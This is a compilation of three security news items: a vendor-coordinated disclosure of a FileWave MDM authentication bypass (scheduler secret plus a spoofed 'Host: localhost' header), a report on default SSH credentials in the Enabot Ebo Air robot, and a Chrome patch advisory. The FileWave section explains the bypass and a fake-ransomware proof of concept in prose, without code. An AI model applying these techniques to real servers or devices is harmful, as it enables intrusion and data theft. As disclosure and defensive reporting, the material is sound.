**_**A request to a vulnerable FileWave MDM server, passing the** SCHEDULER\_SECRET **in its HTTP** Authorization **header, and therefore the server treats the request as if it was made by the scheduler service.**_**

This vulnerability exists in FileWave up to version 13.1.3. However, when we tested this vulnerability against newer versions of the system, we learned it did not work. Something changed making the vulnerability above irrelevant in newer versions, so we decided to look into what that was in newer versions and find a bypass to this new security mechanism.

As it turns out, FileWave changed this logic inside the FWAuthMixin class, instead only accepting valid users’ tokens.

**_**The code to the** test\_func **function in versions newer than 13.1.3. We can see that the server no longer compares the authorization header to the scheduler secret.**_**

This change had us stumped for a second, thinking our exploit is no longer viable. However, when we kept searching for new code, we discovered that FileWave added a new middleware (code which runs before requests are handled). This middleware, aptly named AppTokenMiddleware (and defined in /usr/local/filewave/django/fwauth/middleware.py) performs a similar action to the previous one used inside the older version of test\_func function.

**_**The new middleware function code.**_**

As we can see, this code looks really similar to the old code, comparing once again the Authorization Header to the scheduler secret. However, this time a new check is introduced, comparing request.get\_host() to localhost. If we pass this check, we will once again be granted the permissions of the super\_user. When we searched for what get\_host returns, we reached this documentation from Django:

As we can see, this value also comes from headers users supply, namely from the Host HTTP header. This means that because we supply this value, we can simply supply localhost as our value, thus passing this new check and gaining the super\_user permissions.

**_**We can see that in this request in newer versions of FileWave MDM, the** Host **header is changed to bypass the new check and be** localhost**, thus passing the check and gaining the privileges of** super\_user._**

Using this vulnerability, in either variety described above, we were able to gain highest privileges in all versions of the FileWave MDM. This allows us to gain the ability to attack and control every instance exposed to the internet. This enables us to control all of the servers’ managed devices, exfiltrate all sensitive data being held by the devices, including usernames, email addresses, IP addresses, geo-location etc, and install malicious software on managed devices.

**Proof-of-Concept Exploit**

In order to showcase this vulnerability and the severity and potential harm it can cause, we created a standard FileWave setup, and enrolled 6 devices of our own. Then, using this vulnerability, we exploited the MDM web server, which allowed us to leak data about all of the devices managed by this MDM server. 

Lastly, using regular MDM functionality which allows IT administrators to install packages and software on managed devices, we installed malicious packages on each controlled device, popping a fake ransomware virus on each of those managed devices. Doing so, we demonstrated how a potential attacker can leverage Filewave’s capabilities in order to take control over different managed devices.

We started our testbed with multiple devices connected to the Filewave server.

Then, we ran our exploit in order to bypass authentication on the MDM server and gain administrative access to it. Using this access, we exfiltrated information about the managed devices, including their operation system, ecosystem, settings, and much more.

Finally, We pushed a malicious package to all of the managed devices, which resulted in us being able to execute remote code on all devices. We used it to install fake ransomware on each device.

****Acknowledgement****

Team82 would like to thank Filewave for its coordination with us in working through this disclosure, and for its swift response in confirming our findings and swiftly patching these vulnerabilities. Filewave has addressed these issues in a recent update v14.7.2 and worked with their customers to patch or update affected systems.

CVE-2022-34907: Filewave MDM Security Vulnerabilities Uncovered by Claroty

By Deeba Ahmed
If exploited, the flaw could have allowed an attacker to hijack the device’s camera and microphone to spy…
This is a post from HackRead.com Read the original post: Flaws in Enabot Ebo Air Home Security Robot Allowed Attackers to Spy on Users

****If exploited, the flaw could have allowed an attacker to hijack the device’s camera and microphone to spy on the homeowners.****

Security lab Modux researchers identified a flaw in Enabot’s Ebo Air smart robot, a device designed to entertain your entire family and pets. As per Modux researchers’ findings, attackers could easily hack the smart robot by exploiting the flaw and spying on the occupants/users.

The attacker can record videos, compromise the camera, and communicate with the users via the device’s built-in microphone. All this can happen while the device owners remain unaware of hacking, and the attacker can discreetly monitor the indoor activities.

Image captured by researchers (Image: Modux Labs

**What is the Flaw?**

While testing the Ebo Air smart robot, Modux discovered it was pre-configured with a default admin password. Therefore, an attacker could use the password to connect to the device through the Secure Shell/SSH network communication protocol, which computers use to enable communication.

Once this is done, the attacker can access and exploit almost all functions of the device, from accessing/capturing audio video to conducting surveillance. It is worth noting that the hack could be successful only if the attacker hacks your home Wi-Fi network, which isn’t too difficult considering the poor security mechanisms in routers.

**Risks Associated with the Flaw**

When attackers gain remote control over the device, they can fully control it remotely (from anywhere) anytime. Furthermore, any Ebo Air robot could be exploited with the flaw, whether on sale or in use by homeowners, because the default password was the same.

Another issue is that the device didn’t get wiped entirely after a factory reset, so the users’ passwords would still be accessible even if the device is sold. In that case, the new owner could easily access your home Wi-Fi network and identify your location.

**Current Status of the Flaw**

According to Modux Labs’ blog post, they promptly informed Enabot about the flaw, and the company responded positively. The company fixed the flaw and mitigated the threat by terminating the SSH service and eliminating the chance of an attacker controlling the device.

Moreover, Enabot fixed the incomplete factory data reset issue. However, Ebo Air users can still be at risk unless they update the app and device to install the latest security fixes.

**Lesson Learned**

In conclusion, it is evident that IoT devices are at major risk due to their default credentials. One must be sure to change these credentials after setting up the device. Additionally, it is important to keep an eye on the latest security patches issued by the manufacturer. By doing so, we can help mitigate the risk of our IoT devices being compromised.

**More IoT Security News**

1.  ThroughTek Flaw Exposed Millions of IoT Cameras to Spying
2.  New malware found targeting IoT devices, Android TV globally
3.  Millions of IoT devices, baby monitors open to audio, video snooping
4.  High severity Intel chip flaw left cars, medical and IoT devices vulnerable
5.  Feds Dismantle Russian Rsocks Botnet Powered by Millions of IoT Devices

Flaws in Enabot Ebo Air Home Security Robot Allowed Attackers to Spy on Users

Google has issued an update for the Chrome browser that includes 11 security fixes, including 5 with a high severity
The post Update Google Chrome now! New version includes 11 important security patches appeared first on Malwarebytes Labs.

The latest Google Chrome update includes 11 security fixes, some of which could be exploited by an attacker to take control of an affected system. Google Chrome’s Stable channel has been updated to 103.0.5060.134 for Windows, Mac, and Linux, and the new version will roll out over the coming days/weeks.

**Vulnerabilities**

Of the 11 security fixes five are use-after-free issues, including four that are marked with a severity of “high.” Use after free (UAF) vulnerabilities occur because of the incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The four high-severity use-after-free vulnerabilities resolved with the latest Chrome update are tracked as follows:

**CVE-2022-2477** is a use-after-free vulnerability in Guest View that could allow arbitrary code execution following interaction by the victim.

**CVE-2022-2478** is a use-after-free vulnerability in Chrome’s PDF handling code. Not many details are available but the attacker needs the victim to engage in some kind of user interaction to exploit this vulnerability.

**CVE-2022-2479** is caused by insufficient validation of untrusted input in File. No further details were given but successful exploitation requires user interaction by the victim.

**CVE-2022-2480** is a use-after-free vulnerability in Chrome’s Service Worker API. (Service workers are specialized JavaScript assets that act as proxies between web browsers and web servers.)

**CVE-2022-2481** is a use-after-free vulnerability in Views. The Chrome user interface is constructed of a tree of components called Views. These Views are responsible for rendering, layout, and event handling.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Android users will also find an update waiting.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Chrome is up to date

After the update the version should be **103.0.5060.134** or later.

Stay safe, everyone!

Tag

#android